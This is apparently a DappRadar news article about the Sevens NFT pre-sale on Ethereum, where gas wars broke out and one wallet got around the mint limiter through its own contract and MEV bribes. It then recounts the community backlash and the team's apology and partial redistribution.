Smart contract exploit and gas wars rile up the NFT community. Savvy dev or inside job?
The Sevens NFT collection, one of the most awaited Ethereum-based drops for September, officially launched its pre-sale event last night. Unfortunately, a series of events placed a dark shadow on the much-anticipated drop. On one hand, the so-called “gas wars” phenomenon occurred, and on the other, someone exploited the smart contract limiter, allowing one wallet to mint 1000 NFTs.
The Sevens had a meteoric rise in popularity across all social media channels in the past few weeks. Their main activity up until now was hyping up the community for this next great NFT collection. And it seemed to be working. Throughout the whole day yesterday, Twitter and Discord users were chatting in happy excitement for the upcoming drop. Most of them even added “777” to their handles to show their support for the project. Unfortunately, once the smart contract went live, this happy and cheerful vibe quickly transformed into disappointment and in some cases even anger.
What was the plan?
In a rather detailed Twitter post from the official The Sevens account, one of the devs explained the rules for the upcoming pre-sale.
The idea was that for the first seven minutes after the smart contract went live, each wallet had the right to mint a single The Sevens NFT per transaction. After the seven minutes passed, this minimum mint increased to seven NFTs per transaction.
In theory, this sounds great and is a very clever marketing strategy with all the sevens in it. Unfortunately, things did not go as planned.
What went wrong with The Sevens NFT drop?
All was great up until seconds after the pre-launch for The Sevens NFT collection started. The first thing that went sideways, which was expected to some extent, were the huge gas fees people had to pay. While the mint price for a The Sevens NFT was 0.07 ETH, gas fees were exorbitant. Users on Twitter reported seeing figures in the thousands and even hundreds of thousands. Even so, many people jumped on the bandwagon and tried minting despite the high has fees.
Here comes the second problem: 1ethSHOP. This is a user account that started minting The Sevens NFTs straight through the smart contract on Etherscan rather than through the official website. This feature was purposefully enabled by the devs team to allow more flexibility for collectors. Unfortunately, for some, 1ethSHOP found a vulnerability in the smart contract that allowed him to mint 1000 NFTs, while other users were scraping their last ETH reserves to battle the gas fees and try to mint through the website. You can see how this is unfair.
In essence, by the end of the pre-sale, whoever managed to win in the “gas wars” got a minimal amount of The Sevens NFTs. Simultaneously, 1ethSHOP snatched one-seventh of the whole collection.
How did 1ethSHOP manage that?
Ah, the joys of new technology. It turns out that 1ethSHOP is a rather knowledgeable individual. Especially when it comes to coding, Solidity, and the overall workflow of smart contracts on Ethereum. The Sevens was not very fast in identifying what happened, and only released a statement regarding the incident this morning,. However, Twitter users quickly started investigating.
In a very detailed Twitter thread, that has since generated more than 4,000 likes and 1,200 re-tweets, @0xBender explained the “hack”. According to him, 1ethSHOP managed to sidestep the limiter set in The Sevens smart contract. In essence, 1ethSHOP created his own smart contract, which then interacted with the collection’s smart contract, completely avoiding the timestamp limiter. The 1ethSHOP smart contract operated within The Sevens smart contract and utilized a mechanism called MEV bribe to essentially hijack entire blocks and ensure that his transactions are processed. With extremely low gas fees!
Thanks to this exploit, 1ethSHOP managed to quickly get his hands on 1000 The Sevens NFTs essentially throwing the rest of the pre-sale in disarray. Not only that, his OpenSea profile started flooding the market with The Sevens NFTs, and some people who couldn’t win in the gas wars bought NFTs from him.
The news of one account holding so many The Sevens NFTs quickly broke out in social media. Consequently, the reaction from the community was bordering a riot. That’s understandable, having in mind that hundreds of users spent ETH in gas fees, and their transactions failed. All of this, while one smart kid got one-seventh of the collection.
The official The Sevens Discord channel was on fire throughout the whole night, and the community was not happy. Many started speculating that this exploit was organized by the Sevens team exclusively for profit. Others were adding oil to the fire by saying the whole project is fake, and no one could go from 1,000 to 40,000 followers in a matter of days.
Expectedly, a wave of disappointed tweets flooded the NFT Twitter space.
The Sevens accounts were overwhelmed with negative reactions. They were probably grateful that Twitter censors hate speech to an extent. Some users were definitely more eloquent in their disappointment. Interestingly, the devs and marketing team behind the collection only admitted that something went wrong hours later, after posting tweets that the collection had successfully sold out.
The Sevens apologize?
In an official Medium apology, The Sevens team recognized that something had gone terribly wrong with their public sale event. The apology dropped hours after the news broke on Twitter. According to the text, The Sevens reached out to 1ethSHOP and managed to strike a deal with him. The apology goes on to explain that 1ethSHOP was actually a huge fan of the collection. In fact, that’s what pushed him to undertake such actions and snatch 1000 NFTs. In an effort to mitigate the negative effects of his actions, 1ethSHOP offered to return 500 of the NFTs to the official The Sevens marketing address. This happened. Now the team behind the collection is working out in what way to redistribute these NFTs to the community.
However, the question remains – why does 1ethSHOP get to keep the remaining 500 NFTs? In a Twitter post, 1ethSHOP explains that it cost him upwards of $1 million to return half of what he initially purchased. This includes the purchase price, gas fees for purchase, and gas fees for returning the NFTs to The Sevens.
The reactions to this apology were mixed. Some people recognize the ingenuity 1ethSHOP employed, and raise the fair point that anyone else who had the knowledge to go through this process would have done the same. Some users like Solaplex even asked for a tutorial:
Others, however, still feel cheated. Twitter users ask why he got to keep 500 NFTs, when other people lost significant amounts of ETH on failed transactions and didn’t even manage to get a single one.
The Sevens official Twitter channel also saw a bunch of negative comments following the apology post. Unfortunately, such a huge mishap can completely destroy a project’s reputation. Not to mention take away any trust the community had in it.
What’s next for The Sevens NFT owners?
While The Sevens has taken steps in the right direction, this is a huge setback for the project. According to the Medium post, the 500 NFTs that were returned will probably be distributed to user wallets that can prove they had failed transactions during the mint yesterday. However, a decision has not yet been made on that matter. The Sevens is looking for community input on the subject. Additionally, the team will add 50 more NFTs from their marketing pool to the future airdrop.
Unfortunately, whatever efforts The Sevens put towards remedying this situation, the stain will remain. One positive thing that can be taken from this is that NFT developers now know about this exploit. Hopefully, this will be a lesson learned for the whole NFT community. Future collections can now find ways to protect their smart contracts from this type of attack.
DappRadar will continue monitoring The Sevens development, as this situation resolves further. Stay tuned, and if you’d like to learn more about The Sevens, check out the links below.